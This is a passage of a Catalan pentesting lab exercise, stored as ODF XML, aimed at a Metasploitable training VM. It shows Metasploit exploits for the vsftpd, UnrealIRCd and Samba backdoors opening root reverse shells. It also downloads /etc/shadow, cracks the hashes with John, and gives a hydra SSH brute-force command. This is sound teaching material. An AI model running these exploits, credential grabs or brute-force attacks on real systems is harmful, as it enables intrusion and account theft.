      <text:p text:style-name="Codi_20_Ini">msf exploit(unix/ftp/vsftpd_234_backdoor) &gt; set RHOSTS 192.168.100.20</text:p>
      <text:p text:style-name="Codi_20_Ini">RHOSTS =&gt; 192.168.100.20</text:p>
      <text:p text:style-name="Codi_20_Ini">msf exploit(unix/ftp/vsftpd_234_backdoor) &gt; set LHOST 192.168.100.10</text:p>
      <text:p text:style-name="Codi_20_Ini">LHOST =&gt; 192.168.100.10</text:p>
      <text:p text:style-name="Codi_20_Ini">msf exploit(unix/ftp/vsftpd_234_backdoor) &gt; run</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Started reverse TCP handler on 192.168.100.10:4444 </text:p>
      <text:p text:style-name="Codi_20_Ini">[*] 192.168.100.20:21 - Running automatic check ("set AutoCheck false" to disable)</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] 192.168.100.20:21 - FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4)</text:p>
      <text:p text:style-name="Codi_20_Ini">[+] 192.168.100.20:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present</text:p>
      <text:p text:style-name="Codi_20_Ini">[+] 192.168.100.20:21 - Backdoor has been spawned!</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Meterpreter session 1 opened (192.168.100.10:4444 -&gt; 192.168.100.20:40573) at 2026-08-07 12:15:54 +0200</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">meterpreter &gt; getuid</text:p>
      <text:p text:style-name="Codi_20_Ini">Server username: root</text:p>
      <text:p text:style-name="Codi_20_Ini">meterpreter &gt; sysinfo</text:p>
      <text:p text:style-name="Codi_20_Ini">Computer <text:s text:c="4"/>: metasploitable.thos.local</text:p>
      <text:p text:style-name="Codi_20_Ini">OS <text:s text:c="10"/>: Ubuntu 8.04 (Linux 2.6.24-16-server)</text:p>
      <text:p text:style-name="Codi_20_Ini">Architecture : i686</text:p>
      <text:p text:style-name="Codi_20_Ini">BuildTuple <text:s text:c="2"/>: i486-linux-musl</text:p>
      <text:p text:style-name="Codi_20_Ini">Meterpreter <text:s/>: x86/linux</text:p>
      <text:p text:style-name="Codi_20_Ini">meterpreter &gt; </text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="alternativa-2-unrealircd-backdoor"/><text:bookmark-start text:name="__RefHeading___Toc1950_1837196447"/>Alternativa 2: <text:span text:style-name="CodiInline">UnrealIRCd backdoor</text:span><text:bookmark-end text:name="alternativa-2-unrealircd-backdoor"/><text:bookmark-end text:name="__RefHeading___Toc1950_1837196447"/></text:h>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">msfconsole</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">search</text:span><text:span text:style-name="NormalTok"> unreal_ircd</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">use</text:span><text:span text:style-name="NormalTok"> 0</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="BuiltInTok">set</text:span><text:span text:style-name="NormalTok"> RHOSTS 192.168.100.20</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="BuiltInTok">set</text:span><text:span text:style-name="NormalTok"> LHOST 192.168.100.10</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">run</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">getuid</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">sysinfo</text:span> </text:p>
      <text:p text:style-name="First_20_paragraph">Si l’explotació té èxit, s’obté una shell amb privilegis root directament (aquest exemple és especialment il·lustratiu perquè el backdoor és senzill d’entendre).</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:soft-page-break/>┌──(ramon㉿kali)-[~]</text:p>
      <text:p text:style-name="Codi_20_Ini">└─$ msfconsole</text:p>
      <text:p text:style-name="Codi_20_Ini">Metasploit tip: Save the current environment with the save command, </text:p>
      <text:p text:style-name="Codi_20_Ini">future console restarts will use this environment again</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="50"/></text:p>
      <text:p text:style-name="Codi_20_Ini">%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%% <text:s text:c="4"/>%%% <text:s text:c="8"/>%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%% <text:s/>%% <text:s/>%%%%%%%% <text:s text:c="2"/>%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%% <text:s/>% <text:s/>%%%%%%%% <text:s text:c="2"/>%%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%% <text:s/>%% <text:s/>%%%%%% <text:s text:c="2"/>%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%% <text:s/>%%%%%%%%% <text:s text:c="2"/>%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%%%%% <text:s/>%%% <text:s/>%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%%%% <text:s text:c="3"/>%% <text:s text:c="2"/>%%%%%%%%%%% <text:s/>%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% <text:s/>%%% <text:s/>%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%%%% <text:s/>%% <text:s/>%% <text:s/>% <text:s text:c="5"/>%% <text:s text:c="5"/>%% <text:s text:c="3"/>%%%%% <text:s text:c="5"/>% <text:s text:c="3"/>%%%% <text:s/>%% <text:s text:c="2"/>%%%%%% <text:s text:c="6"/>%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%%%% <text:s/>%% <text:s/>%% <text:s/>% <text:s/>%%% %%%% <text:s/>%%%% <text:s/>%% <text:s/>%%%% <text:s/>%%%% <text:s/>%% %% <text:s/>%% %%% %% <text:s/>%%% <text:s/>%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%%%% <text:s/>%%%%%% <text:s/>%% <text:s text:c="2"/>%%%%%% <text:s text:c="2"/>%%%% <text:s/>%%% <text:s/>%%%% <text:s/>%% <text:s text:c="3"/>%% <text:s/>%%% %%% %% <text:s text:c="2"/>%% <text:s/>%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%%%%%%%%%%%% %%%% <text:s text:c="4"/>%%%%% <text:s text:c="3"/>%% <text:s/>%% <text:s text:c="2"/>% <text:s text:c="3"/>%% <text:s/>%%%% <text:s/>%%%% <text:s text:c="2"/>%%% <text:s text:c="2"/>%%% <text:s text:c="4"/>%</text:p>
      <text:p text:style-name="Codi_20_Ini">%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% <text:s/>%%%%%%% %%%%%%%%%%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% <text:s text:c="9"/>%%%%%%%%%%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini">%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="77"/></text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="7"/>=[ metasploit v6.4.135-dev <text:s text:c="30"/>]</text:p>
      <text:p text:style-name="Codi_20_Ini">+ -- --=[ 2,654 exploits - 1,338 auxiliary - 2,141 payloads <text:s text:c="4"/>]</text:p>
      <text:p text:style-name="Codi_20_Ini">+ -- --=[ 433 post - 49 encoders - 14 nops - 12 evasion <text:s text:c="8"/>]</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">Metasploit Documentation: https://docs.metasploit.com/</text:p>
      <text:p text:style-name="Codi_20_Ini">The Metasploit Framework is a Rapid7 Open Source Project</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">msf &gt; search unreal_ircd</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">Matching Modules</text:p>
      <text:p text:style-name="Codi_20_Ini">================</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="3"/># <text:s/>Name <text:s text:c="39"/>Disclosure Date <text:s/>Rank <text:s text:c="6"/>Check <text:s/>Description</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="3"/>- <text:s/>---- <text:s text:c="39"/>--------------- <text:s/>---- <text:s text:c="6"/>----- <text:s/>-----------</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="3"/>0 <text:s/>exploit/unix/irc/unreal_ircd_3281_backdoor <text:s/>2010-06-12 <text:s text:c="6"/>excellent <text:s/>Yes <text:s text:c="3"/>UnrealIRCD 3.2.8.1 Backdoor Command Execution</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/irc/unreal_ircd_3281_backdoor</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">msf &gt; use 0</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Using configured payload cmd/linux/http/x86/meterpreter/reverse_tcp</text:p>
      <text:p text:style-name="Codi_20_Ini">msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; set RHOSTS 192.168.100.20</text:p>
      <text:p text:style-name="Codi_20_Ini">RHOSTS =&gt; 192.168.100.20</text:p>
      <text:p text:style-name="Codi_20_Ini">msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; set LHOST 192.168.100.10</text:p>
      <text:p text:style-name="Codi_20_Ini">LHOST =&gt; 192.168.100.10</text:p>
      <text:p text:style-name="Codi_20_Ini">msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; run</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Started reverse TCP handler on 192.168.100.10:4444 </text:p>
      <text:p text:style-name="Codi_20_Ini">[*] 192.168.100.20:6667 - Running automatic check ("set AutoCheck false" to disable)</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] 192.168.100.20:6667 - Connected to 192.168.100.20:6667</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:soft-page-break/>[*] 192.168.100.20:6667 - Trying to register a new IRC user: jose</text:p>
      <text:p text:style-name="Codi_20_Ini">[+] 192.168.100.20:6667 - The target appears to be vulnerable. UnrealIRCd detected via IRC commands</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] 192.168.100.20:6667 - Connected to 192.168.100.20:6667</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] 192.168.100.20:6667 - Sending IRC backdoor command</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Sending stage (1062760 bytes) to 192.168.100.20</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Meterpreter session 1 opened (192.168.100.10:4444 -&gt; 192.168.100.20:57835) at 2026-08-07 12:42:38 +0200</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">meterpreter &gt; getuid</text:p>
      <text:p text:style-name="Codi_20_Ini">Server username: root</text:p>
      <text:p text:style-name="Codi_20_Ini">meterpreter &gt; sysinfo</text:p>
      <text:p text:style-name="Codi_20_Ini">Computer <text:s text:c="4"/>: metasploitable.thos.local</text:p>
      <text:p text:style-name="Codi_20_Ini">OS <text:s text:c="10"/>: Ubuntu 8.04 (Linux 2.6.24-16-server)</text:p>
      <text:p text:style-name="Codi_20_Ini">Architecture : i686</text:p>
      <text:p text:style-name="Codi_20_Ini">BuildTuple <text:s text:c="2"/>: i486-linux-musl</text:p>
      <text:p text:style-name="Codi_20_Ini">Meterpreter <text:s/>: x86/linux</text:p>
      <text:p text:style-name="Codi_20_Ini">meterpreter &gt;</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="alternativa-3-samba-usermap_script"/><text:bookmark-start text:name="__RefHeading___Toc1952_1837196447"/>Alternativa 3: <text:span text:style-name="CodiInline">Samba usermap_script</text:span><text:bookmark-end text:name="alternativa-3-samba-usermap_script"/><text:bookmark-end text:name="__RefHeading___Toc1952_1837196447"/></text:h>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">msfconsole</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">search</text:span><text:span text:style-name="NormalTok"> usermap_script</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">use</text:span><text:span text:style-name="NormalTok"> 0</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="BuiltInTok">set</text:span><text:span text:style-name="NormalTok"> RHOSTS 192.168.100.20</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="BuiltInTok">set</text:span><text:span text:style-name="NormalTok"> LHOST 192.168.100.10</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">run</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="FunctionTok">whoami</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="FunctionTok">hostname</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="FunctionTok">id</text:span> </text:p>
      <text:p text:style-name="First_20_paragraph">Si l’explotació té èxit, s’obté una shell amb privilegis root directament.</text:p>
      <text:p text:style-name="Codi_20_Ini">┌──(ramon㉿kali)-[~]</text:p>
      <text:p text:style-name="Codi_20_Ini">└─$ msfconsole</text:p>
      <text:p text:style-name="Codi_20_Ini">Metasploit tip: Enable verbose logging with set VERBOSE true</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="50"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="35"/>___ <text:s text:c="9"/>____</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="31"/>,-"" <text:s text:c="2"/>`. <text:s text:c="5"/>&lt; HONK &gt;</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="29"/>,' <text:s/>_ <text:s text:c="2"/>e )`-._ / <text:s/>---- <text:s text:c="53"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="28"/>/ <text:s/>,' `-._&lt;.===-' <text:s text:c="60"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="27"/>/ <text:s/>/ <text:s text:c="74"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="26"/>/ <text:s/>; <text:s text:c="75"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="14"/>_ <text:s text:c="9"/>/ <text:s text:c="2"/>; <text:s text:c="75"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s/>(`._ <text:s text:c="3"/>_.-"" ""--..__,' <text:s text:c="3"/>| <text:s text:c="75"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s/>&lt;_ <text:s/>`-"" <text:s text:c="20"/>\ <text:s text:c="74"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="2"/>&lt;`- <text:s text:c="25"/>: <text:s text:c="73"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="3"/>(__ <text:s text:c="2"/>&lt;__. <text:s text:c="17"/>; <text:s text:c="73"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="5"/>`-. <text:s text:c="2"/>'-.__. <text:s text:c="5"/>_.' <text:s text:c="3"/>/ <text:s text:c="74"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="8"/>\ <text:s text:c="5"/>`-.__,-' <text:s text:c="3"/>_,' <text:s text:c="75"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="9"/>`._ <text:s text:c="3"/>, <text:s text:c="3"/>/__,-' <text:s text:c="78"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="12"/>""._\__,'&lt; &lt;____ <text:s text:c="77"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="17"/>| | <text:s/>`----.`. <text:s text:c="75"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="17"/>| | <text:s text:c="7"/>\ `. <text:s text:c="73"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="17"/>; |___ <text:s text:c="5"/>\-`` <text:s text:c="72"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="17"/>\ <text:s text:c="2"/>--&lt; <text:s text:c="81"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:soft-page-break/><text:s text:c="18"/>`.`.&lt; <text:s text:c="82"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="20"/>`-' <text:s text:c="82"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="106"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="106"/></text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="7"/>=[ metasploit v6.4.135-dev <text:s text:c="30"/>]</text:p>
      <text:p text:style-name="Codi_20_Ini">+ -- --=[ 2,654 exploits - 1,338 auxiliary - 2,141 payloads <text:s text:c="4"/>]</text:p>
      <text:p text:style-name="Codi_20_Ini">+ -- --=[ 433 post - 49 encoders - 14 nops - 12 evasion <text:s text:c="8"/>]</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">Metasploit Documentation: https://docs.metasploit.com/</text:p>
      <text:p text:style-name="Codi_20_Ini">The Metasploit Framework is a Rapid7 Open Source Project</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">msf &gt; search usermap_script</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">Matching Modules</text:p>
      <text:p text:style-name="Codi_20_Ini">================</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="3"/># <text:s/>Name <text:s text:c="31"/>Disclosure Date <text:s/>Rank <text:s text:c="6"/>Check <text:s/>Description</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="3"/>- <text:s/>---- <text:s text:c="31"/>--------------- <text:s/>---- <text:s text:c="6"/>----- <text:s/>-----------</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="3"/>0 <text:s/>exploit/multi/samba/usermap_script <text:s/>2007-05-14 <text:s text:c="6"/>excellent <text:s/>No <text:s text:c="4"/>Samba "username map script" Command Execution</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script <text:s text:c="103"/></text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">msf &gt; use 0</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] No payload configured, defaulting to cmd/unix/reverse_netcat</text:p>
      <text:p text:style-name="Codi_20_Ini">msf exploit(multi/samba/usermap_script) &gt; set RHOSTS 192.168.100.20</text:p>
      <text:p text:style-name="Codi_20_Ini">RHOSTS =&gt; 192.168.100.20</text:p>
      <text:p text:style-name="Codi_20_Ini">msf exploit(multi/samba/usermap_script) &gt; set LHOST 192.168.100.10</text:p>
      <text:p text:style-name="Codi_20_Ini">LHOST =&gt; 192.168.100.10</text:p>
      <text:p text:style-name="Codi_20_Ini">msf exploit(multi/samba/usermap_script) &gt; run</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Started reverse TCP handler on 192.168.100.10:4444 </text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Command shell session 1 opened (192.168.100.10:4444 -&gt; 192.168.100.20:46520) at 2026-08-07 12:57:56 +0200</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">whoami</text:p>
      <text:p text:style-name="Codi_20_Ini">root</text:p>
      <text:p text:style-name="Codi_20_Ini">hostname</text:p>
      <text:p text:style-name="Codi_20_Ini">metasploitable</text:p>
      <text:p text:style-name="Codi_20_Ini">id</text:p>
      <text:p text:style-name="Codi_20_Ini">uid=0(root) gid=0(root)</text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="fase-4-crackeja-contrasenyes"/><text:bookmark-start text:name="__RefHeading___Toc1954_1837196447"/>2.10. Fase 4 — Crackeja contrasenyes<text:bookmark-end text:name="fase-4-crackeja-contrasenyes"/><text:bookmark-end text:name="__RefHeading___Toc1954_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph"><text:span text:style-name="T1">Tasca:</text:span> Amb accés al sistema, extreu el fitxer de contrasenyes (o simula-ho amb un fitxer d’exemple) i crackeja’l.</text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">meterpreter</text:span><text:span text:style-name="NormalTok"> </text:span><text:span text:style-name="OperatorTok">&gt;</text:span><text:span text:style-name="NormalTok"> download /etc/passwd</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">meterpreter</text:span><text:span text:style-name="NormalTok"> </text:span><text:span text:style-name="OperatorTok">&gt;</text:span><text:span text:style-name="NormalTok"> download /etc/shadow</text:span> </text:p>
      <text:p text:style-name="First_20_paragraph">Sortida:</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:soft-page-break/>meterpreter &gt; download /etc/passwd</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Downloading: /etc/passwd -&gt; /home/ramon/passwd</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Downloaded 1.54 KiB of 1.54 KiB (100.0%): /etc/passwd -&gt; /home/ramon/passwd</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Completed <text:s/>: /etc/passwd -&gt; /home/ramon/passwd</text:p>
      <text:p text:style-name="Codi_20_Ini">meterpreter &gt; download /etc/shadow</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Downloading: /etc/shadow -&gt; /home/ramon/shadow</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Downloaded 1.18 KiB of 1.18 KiB (100.0%): /etc/shadow -&gt; /home/ramon/shadow</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Completed <text:s/>: /etc/shadow -&gt; /home/ramon/shadow</text:p>
      <text:p text:style-name="Codi_20_Ini">meterpreter &gt; </text:p>
      <text:p text:style-name="Text_20_body">En un altre terminal:</text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">unshadow</text:span><text:span text:style-name="NormalTok"> passwd shadow </text:span><text:span text:style-name="OperatorTok">&gt;</text:span><text:span text:style-name="NormalTok"> hashes.txt</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="FunctionTok">sudo</text:span><text:span text:style-name="NormalTok"> gunzip /usr/share/wordlists/rockyou.txt.gz</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">john</text:span><text:span text:style-name="NormalTok"> </text:span><text:span text:style-name="AttributeTok">--wordlist</text:span><text:span text:style-name="OperatorTok">=</text:span><text:span text:style-name="NormalTok">/usr/share/wordlists/rockyou.txt hashes.txt</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">john</text:span><text:span text:style-name="NormalTok"> </text:span><text:span text:style-name="AttributeTok">--show</text:span><text:span text:style-name="NormalTok"> hashes.txt </text:span></text:p>
      <text:p text:style-name="First_20_paragraph">Sortida:</text:p>
      <text:p text:style-name="Codi_20_Ini">┌──(ramon㉿kali)-[~]</text:p>
      <text:p text:style-name="Codi_20_Ini">└─$ unshadow passwd shadow &gt; hashes.txt </text:p>
      <text:p text:style-name="Codi_20_Ini">Created directory: /home/ramon/.john</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">┌──(ramon㉿kali)-[~]</text:p>
      <text:p text:style-name="Codi_20_Ini">└─$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz </text:p>
      <text:p text:style-name="Codi_20_Ini">[sudo] contrasenya per a ramon: </text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">┌──(ramon㉿kali)-[~]</text:p>
      <text:p text:style-name="Codi_20_Ini">└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt</text:p>
      <text:p text:style-name="Codi_20_Ini">Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"</text:p>
      <text:p text:style-name="Codi_20_Ini">Use the "--format=md5crypt-long" option to force loading these as that type instead</text:p>
      <text:p text:style-name="Codi_20_Ini">Using default input encoding: UTF-8</text:p>
      <text:p text:style-name="Codi_20_Ini">Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])</text:p>
      <text:p text:style-name="Codi_20_Ini">Will run 2 OpenMP threads</text:p>
      <text:p text:style-name="Codi_20_Ini">Press 'q' or Ctrl-C to abort, almost any other key for status</text:p>
      <text:p text:style-name="Codi_20_Ini">123456789 <text:s text:c="7"/>(klog) <text:s text:c="4"/></text:p>
      <text:p text:style-name="Codi_20_Ini">batman <text:s text:c="10"/>(sys) <text:s text:c="4"/></text:p>
      <text:p text:style-name="Codi_20_Ini">service <text:s text:c="9"/>(service) <text:s text:c="4"/></text:p>
      <text:p text:style-name="Codi_20_Ini">3g 0:00:04:45 DONE (2026-08-07 12:32) 0.01052g/s 49465p/s 197895c/s 197895C/s <text:s/>ejngyhga007..*7¡Vamos!</text:p>
      <text:p text:style-name="Codi_20_Ini">Use the "--show" option to display all of the cracked passwords reliably <text:s text:c="33"/></text:p>
      <text:p text:style-name="Codi_20_Ini">Session completed. <text:s text:c="87"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="86"/></text:p>
      <text:p text:style-name="Codi_20_Ini">┌──(ramon㉿kali)-[~]</text:p>
      <text:p text:style-name="Codi_20_Ini">└─$ john --show hashes.txt <text:s text:c="31"/></text:p>
      <text:p text:style-name="Codi_20_Ini">sys:batman:3:3:sys:/dev:/bin/sh</text:p>
      <text:p text:style-name="Codi_20_Ini">klog:123456789:103:104::/home/klog:/bin/false</text:p>
      <text:p text:style-name="Codi_20_Ini">service:service:1002:1002:,,,:/home/service:/bin/bash</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">3 password hashes cracked, 4 left</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:soft-page-break/><text:s text:c="303"/></text:p>
      <text:p text:style-name="Codi_20_Ini">┌──(ramon㉿kali)-[~]</text:p>
      <text:p text:style-name="Text_20_body">O bé, per a un servei de xarxa (per exemple SSH):</text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">hydra</text:span><text:span text:style-name="NormalTok"> </text:span><text:span text:style-name="AttributeTok">-l</text:span><text:span text:style-name="NormalTok"> msfadmin </text:span><text:span text:style-name="AttributeTok">-P</text:span><text:span text:style-name="NormalTok"> /usr/share/wordlists/rockyou.txt ssh://192.168.100.20</text:span> </text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="fase-5-elabora-linforme"/><text:bookmark-start text:name="__RefHeading___Toc1956_1837196447"/>2.11. Fase 5 — Elabora l’informe<text:bookmark-end text:name="fase-5-elabora-linforme"/><text:bookmark-end text:name="__RefHeading___Toc1956_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph"><text:span text:style-name="T1">Tasca:</text:span> Lliura un informe de pentesting bàsic, que segueixi l’estructura estàndard del sector professional.</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="portada-i-dades-generals"/><text:bookmark-start text:name="__RefHeading___Toc1958_1837196447"/>Portada i dades generals<text:bookmark-end text:name="portada-i-dades-generals"/><text:bookmark-end text:name="__RefHeading___Toc1958_1837196447"/></text:h>
      <text:list text:style-name="L19">
        <text:list-item>
          <text:p text:style-name="P24">Nom, data, mòdul</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P24">Abast de la prova (IPs/màquines analitzades)</text:p>
        </text:list-item>
        <text:list-item>
